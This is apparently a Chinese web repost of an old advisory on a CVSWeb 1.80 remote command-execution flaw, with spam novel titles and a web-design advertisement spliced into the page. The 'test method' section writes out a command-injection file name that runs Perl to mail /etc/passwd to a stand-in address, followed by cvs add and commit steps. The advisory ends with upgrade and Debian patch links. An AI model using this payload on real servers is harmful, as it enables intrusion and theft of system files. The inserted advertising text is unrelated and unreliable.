欢乐颂小说在线阅读,古风名字,绝色狂妃仙魅小说

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

CVSWeb遠(yuǎn)程攻擊漏洞精簡版

此文章主要講述的是CVSWeb遠(yuǎn)程攻擊漏洞,我前兩天在相關(guān)網(wǎng)站看見CVSWeb遠(yuǎn)程攻擊漏洞的資料，覺得挺好，就拿出來供大家分享,以下就是文章的詳細(xì)內(nèi)容介紹，希望會給你帶來一些幫助在此方面。

十多年的濟(jì)寧網(wǎng)站建設(shè)經(jīng)驗，針對設(shè)計、前端、開發(fā)、售后、文案、推廣等六對一服務(wù)，響應(yīng)快，48小時及時工作處理。營銷型網(wǎng)站的優(yōu)勢是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同，自動調(diào)整濟(jì)寧建站的顯示方式，使網(wǎng)站能夠適用不同顯示終端，在瀏覽器中調(diào)整網(wǎng)站的寬度，無論在任何一種瀏覽器上瀏覽網(wǎng)站，都能展現(xiàn)優(yōu)雅布局與設(shè)計，從而大程度地提升瀏覽體驗。創(chuàng)新互聯(lián)公司從事“濟(jì)寧網(wǎng)站設(shè)計”,“濟(jì)寧網(wǎng)站推廣”以來，每個客戶項目都認(rèn)真落實執(zhí)行。

受影響系統(tǒng)：

CVSWeb Developer CVSWeb 1.80

不受影響系統(tǒng)：

CVSWeb Developer CVSWeb 1.89

CVSWeb Developer CVSWeb 1.86

描述：

Cvsweb 1.80包含一個安全遠(yuǎn)程攻擊漏洞，如果攻擊者對cvs庫有寫權(quán)限，他就可以遠(yuǎn)程獲得對cvs server的

shell訪問權(quán)限。出問題的代碼在cvsweb.cgi中：

open($fh, "rlog '$filenames' 2>/dev/null |")

攻擊者通過建立一個特殊的文件名，來發(fā)動攻擊。

<* 來源： Wizdumb *>

測試方法：

警告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學(xué)之用。使用者風(fēng)險自負(fù)!

攻擊者會首先按照下列步驟操作：

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"

touch $SHELLCODE

cvs add $SHELLCODE

cvs commit -m '' $SHELLCODE

然后攻擊者會訪問cvsweb頁面，瀏覽他設(shè)置木馬文件的目錄。這將導(dǎo)致/etc/passwd 文件被

發(fā)送給攻擊者，當(dāng)然攻擊者也可以執(zhí)行其他的命令。

建議：

升級到1.86或者更高版本，下載地址：

http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

[ Debian Linux ]

Debian GNU/Linux 2.1 alias slink

源碼包：

http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc

MD5 checksum: b1810728310882fb72078674521ee369

http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz

MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702

以上的相關(guān)內(nèi)容就是對CVSWeb遠(yuǎn)程攻擊漏洞的介紹，望你能有所收獲。

文章名稱：CVSWeb遠(yuǎn)程攻擊漏洞精簡版
文章轉(zhuǎn)載：http://m.fisionsoft.com.cn/article/cdhdhsc.html

新聞中心

其他資訊